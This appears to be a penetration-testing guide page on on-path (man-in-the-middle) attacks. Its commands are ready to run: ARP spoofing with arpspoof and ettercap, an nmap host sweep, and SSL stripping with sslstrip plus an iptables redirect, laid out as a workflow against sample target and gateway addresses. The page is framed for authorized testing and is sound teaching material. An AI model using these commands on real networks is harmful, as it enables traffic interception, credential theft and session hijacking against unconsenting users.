On-Path / Man in the Middle Attacks
On-Path Attack (Man-in-the-Middle Attack)
Definition: An On-Path Attack, also known as a Man-in-the-Middle (MitM) attack, involves an attacker secretly intercepting and potentially altering the communication between two parties who believe they are directly communicating with each other. The attacker can eavesdrop, capture sensitive data, or inject malicious content into the communication stream.
Conducting an On-Path Attack
Steps to Conduct an On-Path Attack
Network Discovery:
Identify potential targets and gather information about the network.
Tools: Nmap, Netdiscover
ARP Spoofing/Poisoning:
Redirect traffic between the target and the router through the attacker’s machine.
Tools:
arpspoof
,ettercap
,bettercap
Traffic Interception and Analysis:
Capture and analyze the intercepted traffic.
Tools: Wireshark, tcpdump
Traffic Manipulation:
Modify the intercepted traffic to inject malicious content or alter data.
Tools:
mitmproxy
,ettercap
Session Hijacking or Data Extraction:
Extract sensitive data such as login credentials, session cookies, or hijack active sessions.
Tools:
sslstrip
,Wireshark
Tools and Techniques
1. ARP Spoofing with arpspoof
Installation:
sudo apt-get install dsniff
Usage:
# Enable IP forwarding
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
# Start ARP spoofing
sudo arpspoof -i <interface> -t <target_ip> <gateway_ip>
sudo arpspoof -i <interface> -t <gateway_ip> <target_ip>
2. ARP Spoofing with ettercap
Installation:
sudo apt-get install ettercap-text-only
Usage:
# Launch ettercap in interactive mode
sudo ettercap -G
# Select unified sniffing
# Add targets (target and gateway)
# Start ARP poisoning (MitM attack)
3. Traffic Analysis with Wireshark
Installation:
sudo apt-get install wireshark
Usage:
# Launch Wireshark and start capturing traffic on the desired interface
sudo wireshark
4. SSL Stripping with sslstrip
Installation:
sudo apt-get install sslstrip
Usage:
# Start SSL stripping
sudo sslstrip -l 8080
# Redirect traffic to sslstrip
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Example Workflow
Network Discovery:
nmap -sn 192.168.1.0/24
ARP Spoofing:
sudo echo 1 > /proc/sys/net/ipv4/ip_forward sudo arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.10
Traffic Analysis:
sudo wireshark
SSL Stripping:
sudo sslstrip -l 8080 sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Ethical Considerations
Authorization: Always obtain explicit permission from network owners before performing any MitM attacks.
Controlled Environment: Conduct these tests in a controlled and isolated environment to prevent unintentional harm.
Data Protection: Ensure that any intercepted data is handled securely and ethically, with no unauthorized access or disclosure.
References
Nmap Network Scanning: Nmap
ARP Spoofing with dsniff: dsniff
Ettercap for ARP Spoofing: Ettercap
Wireshark for Traffic Analysis: Wireshark
SSL Stripping with sslstrip: sslstrip
By following this guide responsibly, you can simulate On-Path Attacks to assess the security posture of networks and identify potential vulnerabilities, helping to strengthen overall security.
Last updated
Was this helpful?